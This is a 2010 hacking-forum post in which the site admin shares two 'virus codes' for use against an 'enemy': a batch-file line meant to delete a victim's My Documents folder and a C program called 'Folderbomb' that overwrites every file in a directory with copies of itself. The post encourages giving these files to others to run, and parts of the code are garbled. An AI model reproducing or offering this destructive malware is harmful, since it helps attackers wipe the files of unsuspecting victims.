Welcome To Tech-Portal
Welcome To The World Of Tech-Portal. To Enjoy All Services Of This Portal You Will Have To Register Below. Register And Enjoy. Regards: Admin
Welcome To Tech-Portal
Welcome To The World Of Tech-Portal. To Enjoy All Services Of This Portal You Will Have To Register Below. Register And Enjoy. Regards: Admin
Welcome To Tech-Portal
Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
HomeLatest imagesSearchRegisterLog in
Staff Members Needed For Maintainence. Contact Admin.
Search
 
 

Display results as :
 
Rechercher Advanced Search
Affiliates
 
 
Latest topics
» Shutdown Computer With Command Prompt or shortcut for shutdown
Virus Coding And Writing EmptyFri Jul 23, 2010 3:29 pm by Admin

» Pop a banner each time Windows Boots
Virus Coding And Writing EmptyMon Jul 12, 2010 1:37 pm by Admin

» APPLY AS STAFF MEMBER
Virus Coding And Writing EmptySat Jul 10, 2010 11:58 am by Admin

» Top 10 Speed Tweaks For Windows Vista
Virus Coding And Writing EmptySat Jul 10, 2010 10:08 am by Admin

» Portable Oxford Dictionary
Virus Coding And Writing EmptySat Jul 10, 2010 9:56 am by Admin

» Add Your Face to Movie Poster
Virus Coding And Writing EmptyFri Jul 09, 2010 8:21 pm by Admin

» Outline Sketch Effect
Virus Coding And Writing EmptyFri Jul 09, 2010 8:08 pm by Admin

» Separating Complex Objects from Background
Virus Coding And Writing EmptyFri Jul 09, 2010 8:00 pm by Admin

» Real Player Gold
Virus Coding And Writing EmptyFri Jul 09, 2010 4:09 pm by Admin

Social bookmarking
Social bookmarking reddit      

Bookmark and share the address of Welcome To Tech-Portal on your social bookmarking website

Bookmark and share the address of Welcome To Tech-Portal on your social bookmarking website
Statistics
We have 22 registered users
The newest registered user is dan007

Our users have posted a total of 84 messages in 76 subjects
Flag Counter
Virus Coding And Writing Labels=0

 

 Virus Coding And Writing

Go down 
AuthorMessage
Admin
Admin
Admin



Posts : 68
Points : 202
Join date : 2010-07-02
Age : 31
Location : Srinagar

Virus Coding And Writing Empty
PostSubject: Virus Coding And Writing   Virus Coding And Writing EmptyWed Jul 07, 2010 10:03 am

Run this on your own responsibility

VIRUS CODE-1
IT DELETES THE MY DOCUMENTS FOLDER OF UR ENEMY.
HERE'S WHAT U SHOULD DO

OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT WITH BAT FILE Extention.
I MEAN SAVE IT LIKE VIRUS.BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
Code Is Below
rmdir C:\Documents and Settings \S\Q.

VIRUS CODE-2
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......

#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

ENJOY jocolor
Back to top Go down
https://techportal.1talk.net
 
Virus Coding And Writing
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Welcome To Tech-Portal :: Hacking Stuff-
Jump to: